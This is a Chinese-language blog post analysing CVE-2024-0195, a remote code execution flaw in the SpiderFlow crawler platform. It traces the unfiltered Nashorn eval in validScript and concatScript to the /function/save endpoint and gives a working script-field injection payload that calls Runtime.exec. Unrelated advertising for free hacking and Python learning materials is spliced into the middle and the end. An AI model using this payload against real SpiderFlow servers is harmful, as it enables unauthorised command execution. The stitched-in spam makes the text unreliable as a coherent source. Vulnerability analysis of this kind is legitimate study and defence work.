SpiderFlow爬虫平台漏洞利用分析(CVE-2024-0195)

用户57923016702
60 阅读5分钟

2. 数据库搭建

​ 我这里使用的是MySQL5.7,然后使用Navicat运行项目中spider-flow\db\spiderflow.sql这个SQL文件会在数据库中自动生成所需要的数据库:

image-20240113215141449
image-20240113215223454
image-20240113215235300
image-20240113215310529

3. 数据库连接

image-20240113215340735
​ 然后修改数据库配置文件application.properties,路径为:spider-flow\spider-flow-web\src\main\resources\application.properties

image-20240113215518996

4. 运行

spider-flow\spider-flow-web\src\main\java\org\spiderflow\SpiderApplication.java
image-20240113215638797
​ 然后访问路径http://localhost:8088/,成功搭建!
image-20240113215752537

4. 利用过程

​ 首先我们直接在IDEA中寻找危险函数eval,使用Ctrl+shift+F文件搜索:
image-20240113220036696
​ 发现这里有个validScript函数调用了eval危险函数:

    public static void validScript(String functionName,String parameters,String script) throws Exception {
        new ScriptEngineManager().getEngineByName("nashorn").eval(concatScript(functionName,parameters,script));
    }

​ 然后这里的我们去看看eval具体执行的参数是怎么生成的:

image-20240113220311948

    private static String concatScript(String functionName,String parameters,String script){
        StringBuffer scriptBuffer = new StringBuffer();
        scriptBuffer.append("function ")
                .append(functionName)
                .append("(")
                .append(parameters == null ? "" : parameters)
                .append("){")
                .append(script)
                .append("}");
        return scriptBuffer.toString();
    }

​ 可以看到concatScript 方法中,它接受三个参数 functionNameparametersscript,然后将它们拼接成一个 JavaScript 函数的字符串。这里它没有任何的过滤。所以我们可以尝试构造恶意的这三个参数实现RCE。

帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

​ 在上面的函数中将产生如下的字符串:

function functionName(parameters){script}

​ 很明显我们可以构造恶意的script来导致RCE:

​ 例如script的值可以为}Java.type('java.lang.Runtime').getRuntime().exec('calc');{

​ 这样的话我们最终的字符串将会变成:

function functionName(parameters){}Java.type('java.lang.Runtime').getRuntime().exec('calc');{}

​ 然后最后在执行的时候就会直接定义一个函数后执行我们的Java恶意代码。

​ 然后我们分析是哪个函数调用了validScript函数

image-20240113221705800

    public String saveFunction(Function entity) {
        try {
            ScriptManager.validScript(entity.getName(),entity.getParameter(),entity.getScript());
            super.saveOrUpdate(entity);
            init();
            return null;
        } catch (Exception e) {
            logger.error("保存自定义函数出错",e);
            return ExceptionUtils.getStackTrace(e);
        }
    }

​ 然后在FunctionController.java调用了saveFunction

@RestController
@RequestMapping("/function")
public class FunctionController {
    ......
	@RequestMapping("/save")
    public String save(Function function){
        return functionService.saveFunction(function);
    }
    ......
}

​ 然后我们现在就可以去实际的功能点看需要哪些参数:

image-20240113223447553

image-20240113223535043

一、Python所有方向的学习路线

Python所有方向路线就是把Python常用的技术点做整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

二、学习软件

工欲善其事必先利其器。学习Python常用的开发软件都在这里了,给大家节省了很多时间。

三、入门学习视频

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

了解详情:docs.qq.com/doc/DSnl3ZG…

avatar
文章
阅读
粉丝